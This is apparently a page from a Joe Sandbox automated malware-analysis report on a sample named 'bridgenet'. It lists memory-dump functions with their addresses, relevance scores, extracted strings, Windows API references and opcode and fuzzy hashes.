Instruction ID: 6c6e85ea483c9a05c3f4b70b029c29c3a9677c97a9fccee0bfd6f0f3f0c92d40
Opcode Fuzzy Hash: 1e82c6d56170a0ad8f3737788d1e2ec0823a2d583a3d31c7897c12f19058e00c
Instruction Fuzzy Hash: 7A218071908A0C9FDB58EB98D849BFDBBF1FB65311F00422ED00AD3651DB746856CB81

Function 00007FF887D597D1 Relevance: 4.1, Strings: 3, Instructions: 322
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF887D599F9
XE, xrefs: 00007FF887D59820
p[D, xrefs: 00007FF887D59ADD

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d54000_bridgenet.jbxd

Similarity

API ID:
String ID: XE$p[D$r6B
API String ID: 0-863143724
Opcode ID: 5c1753c55e11681c4d33f96502e90ca69756d1ac2e01ccc109a271edc54a5e22
Instruction ID: d3713cd477691491ec2320d90181a24909c43fa575b33859796c9c0aa46c3e15
Opcode Fuzzy Hash: 5c1753c55e11681c4d33f96502e90ca69756d1ac2e01ccc109a271edc54a5e22
Instruction Fuzzy Hash: DCB1B530A589498FEB45EB68C4956BD77F2FFA8380F504679D01EC7296CF38A842CB41

Function 00007FF887D6E6A5 Relevance: 4.0, Strings: 3, Instructions: 292
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6B, xrefs: 00007FF887D6E7D8
r6B, xrefs: 00007FF887D6E864
r6B, xrefs: 00007FF887D6E894

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: r6B$r6B$r6B
API String ID: 0-1049672097
Opcode ID: 18a591be7b684be3114b668db971af85438f1b127caff2591052ef268a00c0ad
Instruction ID: b5980039b32ae2e3a1613dd49e69b45e000d0de82ebfa742205ed346232c6704
Opcode Fuzzy Hash: 18a591be7b684be3114b668db971af85438f1b127caff2591052ef268a00c0ad
Instruction Fuzzy Hash: 5991C631D0CA898FDF95DB6898542BD7BF1FF99750F1802BAE04ED3296DE286801C791

Function 00007FF887D30E43 Relevance: 3.9, Strings: 3, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

b4B, xrefs: 00007FF887D30F17
r6B, xrefs: 00007FF887D30EC5
r6B, xrefs: 00007FF887D30EA7

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d30000_bridgenet.jbxd

Similarity

API ID:
String ID: b4B$r6B$r6B
API String ID: 0-2866943093
Opcode ID: 7aa97511ddb15a6e37c35a24bf70c9f9863ff5c6e52102e4a878326f60af660b
Instruction ID: 5f5c20bedadcc65c962e70fed93d52c84de67e9fe3b6d6cae9166c120414d8c2
Opcode Fuzzy Hash: 7aa97511ddb15a6e37c35a24bf70c9f9863ff5c6e52102e4a878326f60af660b
Instruction Fuzzy Hash: 5241E475A18A8A8FE799DB6CD4643ADAFF1FB95350F4001BAC01ED77D9DA781811C700

Function 00007FF887D63DE9 Relevance: 2.6, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

V_H, xrefs: 00007FF887D63DD0
I, xrefs: 00007FF887D63E06

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: I$V_H
API String ID: 0-3750388174
Opcode ID: 0620b0580e48787887c84467cade039429a5e6267b551a6f55359fd8bf7e04bf
Instruction ID: 4f3b2775bcb6c73e5aa7ff2d6cb07126a5d9022732c5401916eb533b0103c479
Opcode Fuzzy Hash: 0620b0580e48787887c84467cade039429a5e6267b551a6f55359fd8bf7e04bf
Instruction Fuzzy Hash: DF110472C4E7C55FD713DB7488664A87FB0FF56250B4D41EBD049CB0A3E9285889C781

Function 00007FF887D76D55 Relevance: 1.7, APIs: 1, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileTransactedW.KERNEL32 ref: 00007FF887D76E59

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: CreateFileTransacted
String ID:
API String ID: 2149338676-0
Opcode ID: 9afb4d1b08fac05c6f9e3dfeed4978a261267079b903957f97a82d3ebcee1547
Instruction ID: 425f77aa1a9fb690a8ddeed0824da81db77195c3187906323a0a65bae4a5bff7
Opcode Fuzzy Hash: 9afb4d1b08fac05c6f9e3dfeed4978a261267079b903957f97a82d3ebcee1547
Instruction Fuzzy Hash: CD41AB7181CB588FDB58EF5CD8456ED7BF0FBA9320F04426EE089E3251CA71A841CB82

Function 00007FF887D791A9 Relevance: 1.6, APIs: 1, Instructions: 148
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 00007FF887D7929F

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 8a21d75f999b84e8d411aca95120764a143e253c04e016fd2feccc29fa737653
Instruction ID: 284d6eaed964791ff5892f4819c040f2e8974ebc5ba8e1f5c2cf919b45a2a7c2
Opcode Fuzzy Hash: 8a21d75f999b84e8d411aca95120764a143e253c04e016fd2feccc29fa737653
Instruction Fuzzy Hash: 7741D13184D7C84FDB46DB6898556E97FF0EF67220F0942DFD089CB1A3DA28584AC792

Function 00007FF887D76F31 Relevance: 1.6, APIs: 1, Instructions: 136
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 00007FF887D77007

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 5acb96734831745d1fc857bd6915d2e117a02b13a45386707ddb221b2217d860
Instruction ID: 6aa33303811fe26d01e18aed53ae5e904d519e31024e9e7d1d1eb077c168ed40
Opcode Fuzzy Hash: 5acb96734831745d1fc857bd6915d2e117a02b13a45386707ddb221b2217d860
Instruction Fuzzy Hash: 5F31BF7190CA488FDB58DF58D8456F9BBF1FBA9311F00426FD04AD3292CB74A846CB81

Function 00007FF887D73B72 Relevance: 1.6, APIs: 1, Instructions: 124
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 00007FF887D77007

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c4a56075213c245fb7efc18b551bcf5e34227901192be704f0967d6bcc20b105
Instruction ID: b1ca57d39c93f238ae011971137f01f022e476abc3814a77398d9ae6056f5e04
Opcode Fuzzy Hash: c4a56075213c245fb7efc18b551bcf5e34227901192be704f0967d6bcc20b105
Instruction Fuzzy Hash: 95317E7190CA1C8FDB58DF98D8456B9B7F1FBA9311F00822ED04ED3295DB74A845CB81

Function 00007FF887D773EA Relevance: 1.6, APIs: 1, Instructions: 91
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ResumeThread.KERNEL32 ref: 00007FF887D8E2C5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 36407db387f63a4e9430f1ca856561a3caa90718d25bdcf56742b8b9125fcd05
Instruction ID: 3523f0a014d0cef5dd76cde1e51bd4703c1911fc1b585d1dd5f3de9462f4f998
Opcode Fuzzy Hash: 36407db387f63a4e9430f1ca856561a3caa90718d25bdcf56742b8b9125fcd05
Instruction Fuzzy Hash: 43219271908A0C9FEB58DB98C845BFDB7E0FB59321F00422ED05AD3651DB75A816CB81

Function 00007FF887D773AA Relevance: 1.6, APIs: 1, Instructions: 91
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SuspendThread.KERNEL32 ref: 00007FF887D8D275

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: SuspendThread
String ID:
API String ID: 3178671153-0
Opcode ID: 7d3b58fbcd659de6b4917444b7ffb71fe5a081f220c40057c370d4892407e90f
Instruction ID: 0b7424bdeaeecd53790ad0adc7b5dcaeba0a8edf7e108c7469686bab63fee308
Opcode Fuzzy Hash: 7d3b58fbcd659de6b4917444b7ffb71fe5a081f220c40057c370d4892407e90f
Instruction Fuzzy Hash: 4E21903190CA0C9FEB58DB98C849BFDB7E1FB59321F10422ED05AD3651DB75A816CB81

Function 00007FF887D73B42 Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNEL32 ref: 00007FF887D8F7E5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: fa617e3cf3e81f43d9891756c1a74362271e43ec439e1bdb7c83a7d75de8c196
Instruction ID: c5638d866eaa90f508367e9f8a3e603aef7692fea9c6a439098b55efeebbe96b
Opcode Fuzzy Hash: fa617e3cf3e81f43d9891756c1a74362271e43ec439e1bdb7c83a7d75de8c196
Instruction Fuzzy Hash: B0216070908A0C9FEB58DB98D849BFDB7F1FB55321F00422ED04AD3651DB71A856CB91

Function 00007FF887D62361 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

r6B, xrefs: 00007FF887D62511

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: r6B
API String ID: 0-2624010786
Opcode ID: 11028c5fb2bb5b0ddded124584ae0a797c883269b652770fd656499c844c6a05
Instruction ID: bda1467e909fb5bd067c58de81859587219c84d1f4b1f6a060fa6691e20ba482
Opcode Fuzzy Hash: 11028c5fb2bb5b0ddded124584ae0a797c883269b652770fd656499c844c6a05
Instruction Fuzzy Hash: FE41E131D48A498FE765DA18D8547F97BB1FBA5360F0402BAE40EC329ADE687D81C7C1

Function 00007FF887D79971 Relevance: 1.4, APIs: 1, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF887D79A18

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aadf4b604fb7c7424f3e0c03ddf5c236643a0a9b9e954aebff729a6295bb6760
Instruction ID: 4116a9a5cda0e858bb827ff002c20d1500a47eb882a4124e21388302b46698c7
Opcode Fuzzy Hash: aadf4b604fb7c7424f3e0c03ddf5c236643a0a9b9e954aebff729a6295bb6760
Instruction Fuzzy Hash: 15310C3190CA4C8FDB18EB6CD8466F97BF1FBA5311F14426FD04AD3152DA75A816C781

Function 00007FF887D6E0DB Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

8l, xrefs: 00007FF887D6E108

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: 8l
API String ID: 0-3236597306
Opcode ID: 4b78692b746af93dd475e51b0adbbcc090c2c2c15a57b9156e86c4aeb49f37f9
Instruction ID: 70947c2ff3c65820e8bb847a201ace8afb61bf5b9e4adf11efe0e86be3a4738e
Opcode Fuzzy Hash: 4b78692b746af93dd475e51b0adbbcc090c2c2c15a57b9156e86c4aeb49f37f9
Instruction Fuzzy Hash: 64316171E589198BE794EA68D4997BD73F2FB98390F44027AD00EC329ADD287C46D780

Function 00007FF887D7734A Relevance: 1.4, APIs: 1, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00007FF887D79A18

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: fa4b8801bc3827e5970b2f160cc7997265bdfd0d335b793142681ba0f53469de
Instruction ID: 3ad113b22976e1a6fd3104c5d30709775f1b9349763ed2d7978c85bfeb6243cf
Opcode Fuzzy Hash: fa4b8801bc3827e5970b2f160cc7997265bdfd0d335b793142681ba0f53469de
Instruction Fuzzy Hash: 7A21D73190CA4C9FDB18EB5CD8066F977F1FBA9321F10422ED05ED3651CA74A802CB81

Function 00007FF887D6D481 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

8eL, xrefs: 00007FF887D6D4FA

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: 8eL
API String ID: 0-2915619072
Opcode ID: 7f0b366bbe22a2202f8f0585fe3452844e84a376f3629088a166c231c3bb3603
Instruction ID: affaa397e4413351ac98aacef71cc10558e201f5a86e86df7f4dadf46e0faa1c
Opcode Fuzzy Hash: 7f0b366bbe22a2202f8f0585fe3452844e84a376f3629088a166c231c3bb3603
Instruction Fuzzy Hash: FD21D332E4C5494FEF519A58E8407FD7BB1FB95360F090276E40AD7289DE38AD4587C1

Function 00007FF887D773DA Relevance: 1.3, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF887D8E3A5

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D71000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d71000_bridgenet.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: bb94078e805a5369bfbcef86e01a9cacc2b17e8c50125618a1520a4181a443fe
Instruction ID: 2aea9a2fb1e81de0fdf35dc47643fbbf6ec87ccf0d6c7942df6db130d44288af
Opcode Fuzzy Hash: bb94078e805a5369bfbcef86e01a9cacc2b17e8c50125618a1520a4181a443fe
Instruction Fuzzy Hash: 9D21E531908A1C9FDB58DB98C806BFD77E0FB65321F00422ED04ED3691CB74A856CB81

Function 00007FF887D68079 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D68096

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: d1fdbfbdfad84a9ff18bfb7b680ee2dd89ac7edf95fbfe8d4b6edbcc709c13ae
Instruction ID: 7d42575801023436b7de0eee925b12f9c53dd3a1357edd7b3018d91c4aedae7d
Opcode Fuzzy Hash: d1fdbfbdfad84a9ff18bfb7b680ee2dd89ac7edf95fbfe8d4b6edbcc709c13ae
Instruction Fuzzy Hash: 66112432D4E6C54FD702EB7898A64DC7FB0FF46250B0942FBD049CB0A3E918A949C341

Function 00007FF887D55E79 Relevance: 1.3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D55E96

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d54000_bridgenet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: d076de867032008881137129f40bcfafe631dc9102148e8c08ab67cc73275cc5
Instruction ID: 64b7e6112eeada3a888363560e685b1e3c42ed6ae1d1c62d9d91c5178f6942c5
Opcode Fuzzy Hash: d076de867032008881137129f40bcfafe631dc9102148e8c08ab67cc73275cc5
Instruction Fuzzy Hash: F411D331C5EBC54FDB56DB3448694A87FB1FF56240B4A02EBC04BCB0A7EA185909C341

Function 00007FF887D49B1C Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

cM_H, xrefs: 00007FF887D4C172

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: cM_H
API String ID: 0-900796763
Opcode ID: 281bca927f8eaac52afeae6a3febd20357f891ca204f7d35964353929d6cec6c
Instruction ID: b5e2d69135f4d0c5841cfa09ad49a8873a65d0c76988ecea4a10cf1a4298fb54
Opcode Fuzzy Hash: 281bca927f8eaac52afeae6a3febd20357f891ca204f7d35964353929d6cec6c
Instruction Fuzzy Hash: D7111F21E8891A4BFB94EB18C4557BD22B2FF98390F544675D41FD72DAEE28EC02C780

Function 00007FF887D62F59 Relevance: 1.3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D62F76

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 13156e7d62761541d647bd5ae1ac6898f50ae22885f3c45adbe7c59a3bc142ee
Instruction ID: 73a6579d657c35ce4e89e63dc32b5711a7f974a22557443cef306fe1061cf535
Opcode Fuzzy Hash: 13156e7d62761541d647bd5ae1ac6898f50ae22885f3c45adbe7c59a3bc142ee
Instruction Fuzzy Hash: 52F0B47194E7C48FC71ADA34445A85DBF70FF1764074942EEC046CF5A7DA2E9885C701

Function 00007FF887D59799 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D597B6

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D54000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D54000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d54000_bridgenet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 4a30ba19833df6b1d95819f65d7b5598c548907853932370d65b95e6cecd5a11
Instruction ID: 46cedbcaabe0cd1c0dd5060434965e5b878687bcd0a20955b0d292cb98aa2542
Opcode Fuzzy Hash: 4a30ba19833df6b1d95819f65d7b5598c548907853932370d65b95e6cecd5a11
Instruction Fuzzy Hash: D4F0EC6188F3C04FD715DB3448569987F60EF273507CA41EEC085CF1A3D61E8449C701

Function 00007FF8880D80F9 Relevance: 1.3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF8880D8116

Memory Dump Source

Source File: 00000015.00000002.1727493321.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff8880d0000_bridgenet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 7cfc67c8d457fa2bc755ea028d15abb80252d9389e1dc425c372991e5cbefade
Instruction ID: d9f88050bf8d4740390269c12487939dd2964206443d4b82871eea06a26e6893
Opcode Fuzzy Hash: 7cfc67c8d457fa2bc755ea028d15abb80252d9389e1dc425c372991e5cbefade
Instruction Fuzzy Hash: 62F02765A093C44FCB19963848594647FA0EF6224074912FEC042CB1D3DA2C988ACB10

Function 00007FF8880D78C9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF8880D78E6

Memory Dump Source

Source File: 00000015.00000002.1727493321.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff8880d0000_bridgenet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: f78747ab1af18d821e7b786450798ed9aa5dd5e0c360a577af6072bf7fa227ff
Instruction ID: 76a4baa0b6090bd9c5be6b97522ee6dc1131da788283ecc397734bdfd3608e91
Opcode Fuzzy Hash: f78747ab1af18d821e7b786450798ed9aa5dd5e0c360a577af6072bf7fa227ff
Instruction Fuzzy Hash: EBE0657194A7C44FDB199A7488594947FA0EF6721174952EEC045CB1A7EA2D8885C701

Function 00007FF887D43ED9 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D43EF6

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d40000_bridgenet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 390caa46027217faa5373c76adae1a3d2c7f9c98cc859ab5f1c37bb2fcc7bcb3
Instruction ID: 5c4c74a144b54e2fa745ea0a925a88c8783a8234c272a678fc344502bd124f31
Opcode Fuzzy Hash: 390caa46027217faa5373c76adae1a3d2c7f9c98cc859ab5f1c37bb2fcc7bcb3
Instruction Fuzzy Hash: E7F0657158E7C04FCB16D63888694557F60EF6720174A42EEC046CF5A7EA1DD846C741

Function 00007FF887D61C99 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D61CB6

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: db5536318f13e0d9e8396f4c1f7a16a61adb4395cb6fc73c3eef84f1f889d637
Instruction ID: f2fbb2e861d0d66115385e1abc6ab57817c1d962e79638cb7d2f0ee30f9a1f8a
Opcode Fuzzy Hash: db5536318f13e0d9e8396f4c1f7a16a61adb4395cb6fc73c3eef84f1f889d637
Instruction Fuzzy Hash: 85F02B71A4E3C04FCB07D63448584587F71EF6720074A41EEC046CF197EA2DC846C741

Function 00007FF887D6A319 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D6A336

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 1086428d5263d84a6eaeb86f78fabd7a28ec061898498a653821589210960db9
Instruction ID: 5f95798760ba6e4187fdfb71eceb3bd12ddfc301dc14fd15cdd9a80cab2cf774
Opcode Fuzzy Hash: 1086428d5263d84a6eaeb86f78fabd7a28ec061898498a653821589210960db9
Instruction Fuzzy Hash: 04F06571A4E7C44FC716D63448694557F60EF6720174A42EEC046CF1A7EA2DD885CB81

Function 00007FF887D6A289 Relevance: 1.3, Strings: 1, Instructions: 28COMMON

Download Yara Rule

Strings

M, xrefs: 00007FF887D6A2A6

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 9c61730f3be372bac8f3e0423b6c3579e5bff2bbc9491f9c47cdeff88a8a9c59
Instruction ID: b8c322f8bc330c868ffe8f1117f7f7ec77a1441b2cad43fb46995c0d5e234691
Opcode Fuzzy Hash: 9c61730f3be372bac8f3e0423b6c3579e5bff2bbc9491f9c47cdeff88a8a9c59
Instruction Fuzzy Hash: D1F0E57094E3C04FC70A9A7448294557FA0EF6B20034E13EFC045CF1A3EA2DC885C701

Function 00007FF8880D4629 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF8880D4646

Memory Dump Source

Source File: 00000015.00000002.1727493321.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff8880d0000_bridgenet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: b18d20fb422d6b83c1746e70c6c4a269899df1e82b63b331d4f1e7ac9a77a34f
Instruction ID: 18de677f5d544959f0991880ce9e0d06d6d58fb15710fd848273a207d4bca86c
Opcode Fuzzy Hash: b18d20fb422d6b83c1746e70c6c4a269899df1e82b63b331d4f1e7ac9a77a34f
Instruction Fuzzy Hash: 1CE0127184E7C04FCB4AEB7488698547F60AE67310B4A41DEC045CF1B7D62D8849C701

Function 00007FF8880D8339 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF8880D8356

Memory Dump Source

Source File: 00000015.00000002.1727493321.00007FF8880D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8880D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff8880d0000_bridgenet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 49d2c93cf98a227e3bba91a3b76022e0b5ced34d38456cf2bfeac7f275d371ef
Instruction ID: 62807a0dd6a0eeea34ead9a633950531d060b810697658b553960b248eb33487
Opcode Fuzzy Hash: 49d2c93cf98a227e3bba91a3b76022e0b5ced34d38456cf2bfeac7f275d371ef
Instruction Fuzzy Hash: BEE0487194E3C04FCB55EB3484698443F60EE6721078A41EEC045CF1B3D72DD845DB01

Function 00007FF887D6A859 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D6A876

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff887d61000_bridgenet.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: bf41b96cf18f829a51b66b712c70cf4397ec1ecb16530e1c5753a34b212d0657
Instruction ID: 08ea65a10a307ec7e6ae0e470b872733c1fbfed2c5d6db809b164b2639ce5727
Opcode Fuzzy Hash: bf41b96cf18f829a51b66b712c70cf4397ec1ecb16530e1c5753a34b212d0657
Instruction Fuzzy Hash: F3E0127184E3C04FC706DB7588658553FA0EE6B21078E42EEC04ACF1B3E62DD849C701

Function 00007FF887D62329 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF887D62346

Memory Dump Source

Source File: 00000015.00000002.1723423068.00007FF887D61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D61000, based on PE: false

Joe Sandbox IDA Plugin

